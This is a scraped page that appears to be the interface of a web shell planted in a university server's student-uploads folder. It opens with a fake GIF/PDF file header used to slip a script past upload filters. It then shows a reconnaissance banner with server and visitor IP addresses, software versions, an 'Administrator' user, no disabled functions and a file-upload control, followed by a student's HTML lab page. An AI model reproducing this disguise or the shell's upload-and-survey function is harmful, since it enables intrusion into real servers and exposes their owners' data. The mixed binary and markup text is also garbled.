GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/uploads/20243/CST1021/41/16354956/Lab02/ |
Upload File : |
<!DOCTYPE html> <html lang="en"> <head> <title>Lab 2 - Jeffrey Volby</title> <meta charset="utf-8"> <link href="Lab02.css" rel="stylesheet"> <head> <body <h1>Lab 2 - Jeffrey Volby</h1> <section> <h2>HTML Text Formatting</h2> <b>Bold text</b> <strong>Strong text</strong> <i>Italic text</i> <em>Emphasized Text</em> <small>Small text</small> <del>Deleted text</del> <ins>Inserted text</ins> <sub>Subscript text</sub> <sup>Superscript text</sup> <mark>Marked text</mark> </section> </section> <span id="tom">Hello tom</span> <h2>HTML Quotation and Citation Elements</h2> <small>Jeffrey says "HTML must be well formed!"</> <small>CST began as the AIT department and was re-named in 1994</> </section> <h2>HTML Comments</h2> </body> </section> <h2>HTML Colors</h2> <span>This is an un-styled span tag.</> <span>Styled via id.</> <span>Some DodgerBlue text.</> </section> </html>